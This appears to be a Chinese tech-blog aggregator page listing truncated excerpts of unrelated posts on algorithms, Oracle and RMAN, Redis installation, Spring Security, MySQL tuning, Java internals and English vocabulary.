[与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]
功能:
编程之美-子数组的最大乘积
bylijinnan
编程之美
public class MaxProduct {
/**
* 编程之美 子数组的最大乘积
* 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。
* 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。
* 但按题目的意思,是要求得这个子数组,而不
读书笔记-2
chengxuyuancsdn
读书笔记
1、反射
2、oracle年-月-日 时-分-秒
3、oracle创建有参、无参函数
4、oracle行转列
5、Struts2拦截器
6、Filter过滤器(web.xml)
1、反射
(1)检查类的结构
在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。
2、oracle年月日时分秒
s
[求学与房地产]慎重选择IT培训学校
comsci
it
关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题
培训学校的教学楼和宿舍的环境和稳定性问题
我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子...
&nb
RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系
daizj
oracle rman filesperset PARALLELISM
RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转
PARALLELISM ---
我们还可以通过parallelism参数来指定同时"自动"创建多少个通道:
RMAN > configure device type disk parallelism 3 ;
表示启动三个通道,可以加快备份恢复的速度。
简单排序:冒泡排序
dieslrae
冒泡排序
public void bubbleSort(int[] array){
for(int i=1;i<array.length;i++){
for(int k=0;k<array.length-i;k++){
if(array[k] > array[k+1]){
初二上学期难记单词三
dcj3sjt126com
sciet
concert 音乐会
tonight 今晚
famous 有名的;著名的
song 歌曲
thousand 千
accident 事故;灾难
careless 粗心的,大意的
break 折断;断裂;破碎
heart 心(脏)
happen 偶尔发生,碰巧
tourist 旅游者;观光者
science (自然)科学
marry 结婚
subject 题目;
I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码
dcj3sjt126com
redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。
异常一:
make[2]: cc: Command not found
异常原因:没有安装g
并发容器
shuizhaosi888
并发容器
通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。
并发容器ConcurrentHashMap
替代同步基于散列的Map,通过Lock控制。
&nb
Spring Security(12)——Remember-Me功能
234390216
Spring Security Remember Me 记住我
Remember-Me功能
目录
1.1 概述
1.2 基于简单加密token的方法
1.3 基于持久化token的方法
1.4 Remember-Me相关接口和实现
位运算
焦志广
位运算
一、位运算符C语言提供了六种位运算符:
& 按位与
| 按位或
^ 按位异或
~ 取反
<< 左移
>> 右移
1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。
例如:9&am
nodejs 数据库连接 mongodb mysql
liguangsong
mongodb mysql node 数据库连接
1.mysql 连接
package.json中dependencies加入
"mysql":"~2.7.0"
执行 npm install
在config 下创建文件 database.js
java动态编译
olive6615
java HotSpot jvm 动态编译
在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。
HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
Storm0.9.5的集群部署配置优化
roadrunners
优化 storm.yaml
nimbus结点配置(storm.yaml)信息:
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional inf
101个MySQL 的调节和优化的提示
tomcat_oracle
mysql
1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。 2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。 3. 使用电池供电的RAM(注:RAM即随机存储器)。 4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
zoj 3829 Known Notation(贪心)
阿尔萨斯
ZOJ
题目链接:zoj 3829 Known Notation
题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。
解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1